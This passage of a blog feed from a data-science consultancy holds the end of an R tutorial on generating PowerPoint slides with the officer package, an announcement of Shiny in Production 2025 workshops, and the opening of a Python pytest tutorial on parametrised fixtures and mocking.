&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; adelie_plot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;myplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create the PowerPoint file, use &lt;code&gt;print()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(doc, &lt;span style="color:#a5d6ff"&gt;&amp;#34;penguins.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/adelie_slide.png" alt="An example of the PowerPoint output." style="display: block; margin: auto;" /&gt;
&lt;p&gt;And there we have it! I’ve used only two placeholders here to keep the
example simple, but in reality there is no limit.&lt;/p&gt;
&lt;h3 id="looping"&gt;Looping&lt;/h3&gt;
&lt;p&gt;Because the PowerPoint is generated purely from R code, it’s easy to take
advantage of programming constructs. For instance, we could wrap our code in a for
loop and add a slide for each penguin species:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Read in doc again&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# this resets the doc object to the original file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_pptx&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mytemplate.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (penguin_species &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Chinstrap&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Gentoo&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_slide&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Title Slide&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the title using the iterator value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguin_species,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create the plot using the iterator value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; penguin_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; penguin_species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_linedraw&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;transparent&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#F1EADE&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill Length (mm)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper Length (mm)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguin_plot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Output to a file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(doc, &lt;span style="color:#a5d6ff"&gt;&amp;#34;penguins_loop.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/looped_slides.png" alt="An example output for when looping and iteratively adding slides / inserting content." style="display: block; margin: auto;" /&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;There are a few drawbacks to this method:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It is quite annoying to insert large amounts of text using just an R
script&lt;/li&gt;
&lt;li&gt;Content added to the “Slide Master” slide cannot be moved or edited on
the output file&lt;/li&gt;
&lt;li&gt;The web version of PowerPoint doesn’t have the Slide Master
functionality&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, I think the pros outweigh the cons:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Completely (and I mean completely) custom layouts&lt;/li&gt;
&lt;li&gt;I haven’t covered this here but it’s really easy to &lt;a href="https://www.pipinghotdata.com/posts/2020-09-22-exporting-editable-ggplot-graphics-to-powerpoint-with-officer-and-purrr/" rel="external"&gt;convert ggplots
to vector graphics in DrawingML format so they can be edited in
PowerPoint&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Easier to programmatically generate lots of slides&lt;/li&gt;
&lt;li&gt;It can be edited after rendering by anyone!&lt;/li&gt;
&lt;li&gt;It can be styled before rendering by anyone!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Workshops</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/</link><pubDate>Tue, 20 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
.bio {
display: flex;
column-gap: 2rem;
align-items: center;
padding: 1rem 0 2rem 0;
}
.bio img {
width: 200px;
}
[id="register-now"] {
display: block;
margin-bottom: 2rem;
}
@media (max-width: 1290px) {
.bio {
flex-direction: column;
}
}
&lt;/style&gt;
&lt;p&gt;Shiny in Production is heading back to The Catalyst in Newcastle upon Tyne
this October! We’ve got a great mix of workshops and a full day of talks, with speakers
being announced soon. You’ll find all the workshop details below,
and you can sign up now on the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.
Whether you’re just getting started with Shiny or have been using it for years, come join us for a great
hands-on experience with Shiny and other web-based development tools.&lt;/p&gt;
&lt;p&gt;Day one of the conference (Wednesday 8th October) will consist of
three parallel workshops running from 13:30 to 17:00, followed by a drinks reception in the
evening: a great opportunity for networking and debriefing from the
day’s learning.&lt;/p&gt;
&lt;p&gt;&lt;a id="register-now" href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="workshop-1-end-to-end-testing-for-shiny-with-playwright-and-golem---colin-fay"&gt;Workshop 1: End-to-End testing for {shiny} with Playwright and {golem} - &lt;a href="https://colinfay.me/" rel="external"&gt;Colin Fay&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A Shiny application that dazzles in development can still fall apart in
production if user journeys break, data pipelines drift, or browsers
behave unexpectedly. Automated end-to-end (E2E) testing is the safety
net that keeps released apps robust, and Playwright is quickly becoming
the gold-standard tool for doing it across Chrome, Firefox and WebKit.
In this hands-on workshop we’ll walk through a workflow for writing,
running and maintaining Playwright tests that keep your Shiny apps
ship-shape long after launch. Here’s what we’ll tackle:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;why E2E testing matters even when you already have unit tests&lt;/li&gt;
&lt;li&gt;installing and configuring Playwright in a golem project using {pw}&lt;/li&gt;
&lt;li&gt;scripting core user flows—clicks, inputs&amp;hellip;&lt;/li&gt;
&lt;li&gt;validating data and UI state with snapshots and assertions&lt;/li&gt;
&lt;li&gt;running tests headlessly in CI pipelines (GitHub Actions, GitLab CI, Posit Connect)&lt;/li&gt;
&lt;li&gt;handling Shiny-specific behaviour&lt;/li&gt;
&lt;li&gt;debugging failed tests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For this workshop, bring a laptop and a Shiny app you care about.
You’ll leave with a working Playwright test harness you can drop
straight into your projects—plus the confidence to deploy on Friday without fear.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand the role of end-to-end testing in the Shiny deployment pipeline&lt;/li&gt;
&lt;li&gt;be able to install Playwright and scaffold tests from R&lt;/li&gt;
&lt;li&gt;write expressive Playwright scripts that capture user journeys in a Shiny app&lt;/li&gt;
&lt;li&gt;run tests in parallel across browsers locally and in continuous-integration systems&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/colin-fay.jpg" alt="Photo of Colin Fay" /&gt;
&lt;p&gt;Colin Fay is a Lead Developer at &lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;, a French agency specializing in all things R.
By day, he helps companies unlock R&amp;rsquo;s full potential by building tools, architecting infrastructure,
and developing data and software engineering solutions. His expertise spans web applications
(frontend &amp;amp; backend), R in production, and scalable software development.
By night, he&amp;rsquo;s an open-source enthusiast, international speaker, and long-distance runner.
A passionate advocate for the R community, he actively contributes to open-source projects
and shares his knowledge through talks and workshops worldwide.
Colin is the main developer of &lt;a href="https://golemverse.org/" rel="external"&gt;{golem}&lt;/a&gt;, a framework for building robust Shiny applications,
and the lead author of &lt;a href="https://engineering-shiny.org/index.html" rel="external"&gt;Building Production-Grade Shiny Apps&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="workshop-2---asynchronous-shiny---dr-russ-hyde"&gt;Workshop 2: Asynchronous Shiny - &lt;a href="https://github.com/russHyde" rel="external"&gt;Dr Russ Hyde&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Imagine you couldn’t register to attend “Shiny in Production”
if someone else was in the process of registering, and you had to wait
until they had finished before you could click to “Buy tickets on EventBrite”.
This kind of “blocking” shouldn’t happen in modern web applications but is surprisingly
common in Shiny applications. It happens because a single R process handles all of the
server-side processing for multiple users—one long-running task can prevent any other
task from proceeding, hampering interactivity both between and within user-sessions.&lt;/p&gt;
&lt;p&gt;Fortunately, Shiny’s support for asynchronous programming
can alleviate this problem. In the asynchronous approach, you start tasks
running without having to wait for them to complete. However, this requires a
change in mindset for many programmers and there are a few concepts to understand
before you can take advantage of this approach. So, what are you waiting for?
Sign up for this workshop!&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand how within-session and between-session blocking can arise in a Shiny app&lt;/li&gt;
&lt;li&gt;understand the basics of asynchronous computation&lt;/li&gt;
&lt;li&gt;solve between-session blocking with future/promise&lt;/li&gt;
&lt;li&gt;solve blocking the modern way, with ExtendedTask&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-1"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Dr Russ Hyde"/&gt;
&lt;p&gt;Russ has previously worked in molecular biology and bioinformatics. He
holds a PhD in Molecular Physiology and an MSc in Mathematics. Russ is an
author of several CRAN packages and a mentor in the R for Data Science
community.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="workshop-3-figma-and-user-interface-design-for-shiny---pedro-silva"&gt;Workshop 3: Figma and User-Interface Design for Shiny - &lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Applications should look attractive, be engaging, and work intuitively for users.
All of these aspects benefit from spending time focussing on user-interface (UI)
and user experience (UX) design during app development. Indeed, we find that clients
provide lots of feedback on the look and feel of an app, and that it is useful to prepare
a view of the overall design even before any interactive functionality is implemented,
so that design feedback can be obtained as early as possible.&lt;/p&gt;
&lt;p&gt;Graphical tools like Figma allow the designer to build both coarse- and
fine-grained illustrations of how an application or website will look, and simulate
the user workflow through the application. The designs can be shared with clients,
and feedback gathered through comments pinned to the design.&lt;/p&gt;
&lt;p&gt;This workshop requires no prior experience in UI/UX design and will guide
you through your first steps in Figma, demonstrating how to quickly prepare design
ideas for Shiny applications. We’ll also get you started with creating some components—reusable
modules of your design that can transition into different states. You will need a Figma
account to participate; there is a free tier that is sufficient for the workshop.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;create simple wireframe designs in Figma&lt;/li&gt;
&lt;li&gt;set font styles and colour palettes consistently across your design&lt;/li&gt;
&lt;li&gt;use the Bootstrap UI kit in Figma&lt;/li&gt;
&lt;li&gt;create small components with a simple transition into an alternative state&lt;/li&gt;
&lt;li&gt;use CSS to replicate a simple Figma design in Shiny&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-2"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/pedro@2x.jpg" alt="Photo of Pedro Silva" /&gt;
&lt;p&gt;Pedro is a full stack developer with over 15 years of experience in the
field, loves front-end and R Shiny development, and is a moonlight
practitioner of JavaScript dark arts.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="whats-next"&gt;What’s next?&lt;/h3&gt;
&lt;p&gt;Early bird tickets for the conference are still available &lt;strong&gt;at the time of writing&lt;/strong&gt;, so don’t miss out!
The full line-up of speakers will be
announced in the coming weeks. Still not convinced? Head over to our
&lt;a href="https://www.youtube.com/@jumping-rivers" rel="external"&gt;YouTube channel&lt;/a&gt; to take a
look at talks from previous years to see what we have in store.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Advanced Testing in Python</title><link>https://www.jumpingrivers.com/blog/python-testing-advanced/</link><pubDate>Thu, 08 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-testing-advanced/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-testing-advanced/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-testing-advanced/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Writing tests is one of the best ways to keep your code reliable and reproducible. This post builds on our
previous blog about Python testing with pytest (&lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;Part 1&lt;/a&gt;) and
explores some of the more advanced features it offers. From parametrised fixtures to mocking and other useful pytest
plugins, we will show how to make your tests more reproducible and easier to manage, and demonstrate how writing simple
tests can save you time in the long run.&lt;/p&gt;
&lt;h1 id="testing-in-python"&gt;Testing in Python&lt;/h1&gt;
&lt;p&gt;When we write code, it is important to ensure it behaves as expected, which is why we test it. Testing (and re-testing)
our code should be a regular practice, ideally done thoroughly, quickly, and reliably after every change.&lt;/p&gt;
&lt;p&gt;To achieve this, we write additional code to verify the behavior of our main code. We use specific terms
to differentiate between these two types of code:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Production Code:&lt;/strong&gt; the code that fulfills the purpose of the software, and is run by the user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Test Code:&lt;/strong&gt; additional code only used to test the production code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The directory structure for production and testing code typically looks as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./advanced_pytest/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── map.py &lt;span style="color:#8b949e;font-style:italic"&gt;# production code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── parametrised_fixture.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ └── test_map.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└── venv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the production code, in our case &lt;code&gt;map.py&lt;/code&gt;, sits in the root directory and the tests are stored under &lt;code&gt;tests&lt;/code&gt;.&lt;/p&gt;
&lt;h1 id="parametrised-fixtures"&gt;Parametrised fixtures&lt;/h1&gt;
&lt;p&gt;In &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;Part 1&lt;/a&gt; we introduced the concept of fixtures in pytest.
Now, let&amp;rsquo;s explore parametrised fixtures, a powerful feature that allows us to run the same test logic with
different inputs. This helps avoid code duplication while testing various scenarios without rewriting your tests.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.fixture&lt;/span&gt;(params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;input_value&lt;/span&gt;(request):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;param
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_increment&lt;/span&gt;(input_value):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; input_value &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; input_value
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This test will run three times, once for each value in the &lt;code&gt;params&lt;/code&gt; list (1, 2, and 3). By parametrising the fixture,
we effectively reuse the same test logic across multiple inputs. This makes your tests more compact and helps catch
potential issues that might only appear with certain values.&lt;/p&gt;
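&lt;p&gt;As a further sketch of the same idea, the fixture below also passes &lt;code&gt;ids&lt;/code&gt;, so that each run gets a readable label in the pytest report. The &lt;code&gt;increment()&lt;/code&gt; function and the chosen values are hypothetical, added here purely for illustration.&lt;/p&gt;

```python
import pytest


def increment(value):
    """Hypothetical function under test: add one to a number."""
    return value + 1


# Each entry in `params` produces one run of every test that requests the
# fixture; `ids` gives each run a readable label in the pytest report.
@pytest.fixture(params=[0, 1, -5], ids=["zero", "positive", "negative"])
def input_value(request):
    return request.param


def test_increment_adds_one(input_value):
    # Runs three times, once per parameter supplied by the fixture.
    assert increment(input_value) == input_value + 1
```

&lt;p&gt;Running pytest with the &lt;code&gt;-v&lt;/code&gt; flag lists each parametrised run separately, with its label appended to the test name in square brackets.&lt;/p&gt;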
&lt;h1 id="mocking"&gt;Mocking&lt;/h1&gt;
&lt;p&gt;Mocking is the process of replacing a real object with a pretend object, which records how it is called and lets us
assert that it was called as expected. In Python, mocking can be performed via the &lt;code&gt;unittest.mock&lt;/code&gt; module.
We can create a mock version of a function as follows:&lt;/p&gt;
